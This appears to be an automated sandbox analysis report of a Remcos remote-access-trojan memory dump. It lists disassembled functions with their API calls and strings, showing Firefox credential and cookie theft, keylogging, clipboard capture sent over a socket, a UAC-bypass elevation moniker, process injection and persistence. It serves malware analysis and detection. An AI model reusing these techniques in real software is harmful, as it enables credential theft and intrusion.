                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                                                            • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                                                            • API String ID: 65172268-860466531
                                                                                                                                            • Opcode ID: f37c5126c027c7c3e0fa34fe350a0c5b3513135de5084eb22c34a7d5917134fe
                                                                                                                                            • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                                                                                            • Opcode Fuzzy Hash: f37c5126c027c7c3e0fa34fe350a0c5b3513135de5084eb22c34a7d5917134fe
                                                                                                                                            • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                                                                                            Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$CloseFile$FirstNext
                                                                                                                                            • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                                            • API String ID: 1164774033-3681987949
                                                                                                                                            • Opcode ID: 73d22b47f5c5b3aeef604c5c9d6d9dd8cc7f1ea843bbdcbe5a6f1d302209f387
                                                                                                                                            • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                                                                            • Opcode Fuzzy Hash: 73d22b47f5c5b3aeef604c5c9d6d9dd8cc7f1ea843bbdcbe5a6f1d302209f387
                                                                                                                                            • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                                                            Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$Close$File$FirstNext
                                                                                                                                            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                            • API String ID: 3527384056-432212279
                                                                                                                                            • Opcode ID: 2f60c1552ef0b9164ff4f80ef7a6433e0a0068827ec5ce580e755d84d5db7e49
                                                                                                                                            • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                                                                            • Opcode Fuzzy Hash: 2f60c1552ef0b9164ff4f80ef7a6433e0a0068827ec5ce580e755d84d5db7e49
                                                                                                                                            • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                                                                            Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                                                            • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                                                            • API String ID: 726551946-3025026198
                                                                                                                                            • Opcode ID: 6265d7186e0de0a30c9918c1bfd1a64db60bd3c3b533d39b749380a52cbb14bd
                                                                                                                                            • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                                                                            • Opcode Fuzzy Hash: 6265d7186e0de0a30c9918c1bfd1a64db60bd3c3b533d39b749380a52cbb14bd
                                                                                                                                            • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                                                                            Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • OpenClipboard.USER32 ref: 004159C7
                                                                                                                                            • EmptyClipboard.USER32 ref: 004159D5
                                                                                                                                            • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                                                            • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                                            • OpenClipboard.USER32 ref: 00415A61
                                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                                            • CloseClipboard.USER32 ref: 00415A89
                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3520204547-0
                                                                                                                                            • Opcode ID: 19469a6e28cc22ba2c515ea9a8a3fee8ee13006a00461d7d6bf062bbdebaba07
                                                                                                                                            • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                                                                                            • Opcode Fuzzy Hash: 19469a6e28cc22ba2c515ea9a8a3fee8ee13006a00461d7d6bf062bbdebaba07
                                                                                                                                            • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                                                                            Function 00418754 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 0$1$2$3$4$5$6$7
                                                                                                                                            • API String ID: 0-3177665633
                                                                                                                                            • Opcode ID: 9b02e51a1cc6672d7d2f4342b27c01cb84a2fdb077451789e1e817f40a25d538
                                                                                                                                            • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                                                                                            • Opcode Fuzzy Hash: 9b02e51a1cc6672d7d2f4342b27c01cb84a2fdb077451789e1e817f40a25d538
                                                                                                                                            • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                                                                                            Function 004513B7 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                            • String ID: u;~/$<D$<D$<D
                                                                                                                                            • API String ID: 745075371-2648512017
                                                                                                                                            • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                                            • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                                                                                            • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                                            • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                                                                                            Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                                            • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                                            • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                                            • GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                                                                            • ToUnicodeEx.USER32(0047414C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                                            • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                                            • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                                            • String ID: 8[G
                                                                                                                                            • API String ID: 1888522110-1691237782
                                                                                                                                            • Opcode ID: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                                                                            • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                                                                                            • Opcode Fuzzy Hash: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                                                                            • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                                                                                            Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _wcslen.LIBCMT ref: 00406788
                                                                                                                                            • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Object_wcslen
                                                                                                                                            • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                            • API String ID: 240030777-3166923314
                                                                                                                                            • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                                                            • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                                                                                            • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                                                            • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                                                                                            Function 004198C2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                                                                            • GetLastError.KERNEL32 ref: 00419935
                                                                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3587775597-0
                                                                                                                                            • Opcode ID: 7cf647704d9da6e3b27b6f932af26f9fb806ddb2be27768a2356daea2e115d5b
                                                                                                                                            • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                                                                                            • Opcode Fuzzy Hash: 7cf647704d9da6e3b27b6f932af26f9fb806ddb2be27768a2356daea2e115d5b
                                                                                                                                            • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                                                                                            Function 0041B42F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
                                                                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2341273852-0
                                                                                                                                            • Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                                                            • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                                                                                            • Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                                                            • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                                                                                            Function 00418C69 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Find$CreateFirstNext
                                                                                                                                            • String ID: @CG$XCG$`HG$`HG$>G
                                                                                                                                            • API String ID: 341183262-3780268858
                                                                                                                                            • Opcode ID: 5774cababdb4d5a369a22ab3f87ea2fc2860fa82803dc8691cf41792f4cbf442
                                                                                                                                            • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                                                                                                            • Opcode Fuzzy Hash: 5774cababdb4d5a369a22ab3f87ea2fc2860fa82803dc8691cf41792f4cbf442
                                                                                                                                            • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                                                                                                            Function 00452F00 Relevance: 11.9, APIs: 1, Strings: 5, Instructions: 1381COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __floor_pentium4
                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$u;~/
                                                                                                                                            • API String ID: 4168288129-1952322618
                                                                                                                                            • Opcode ID: 66bc95b00190c33de1dc88885a8d3c2e2540cf288971a00217ef3550ead5f7a6
                                                                                                                                            • Instruction ID: 57cc16b57fb9b80973019f24a4c29afa226e887048a240d5689d112d8919aadd
                                                                                                                                            • Opcode Fuzzy Hash: 66bc95b00190c33de1dc88885a8d3c2e2540cf288971a00217ef3550ead5f7a6
                                                                                                                                            • Instruction Fuzzy Hash: 08C26F72D046288FDB25CE28DD407EAB7B5EB44346F1441EBD84DE7242E778AE898F44
                                                                                                                                            Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                            • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                            • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                            • API String ID: 2127411465-314212984
                                                                                                                                            • Opcode ID: d6f20773c12b8c719fd138cff85b637bba54a7f75e57a90f67b974f823c07467
                                                                                                                                            • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                                                                                                            • Opcode Fuzzy Hash: d6f20773c12b8c719fd138cff85b637bba54a7f75e57a90f67b974f823c07467
                                                                                                                                            • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                                                            Function 0044800F Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                                                            • _free.LIBCMT ref: 00448067
                                                                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                            • _free.LIBCMT ref: 00448233
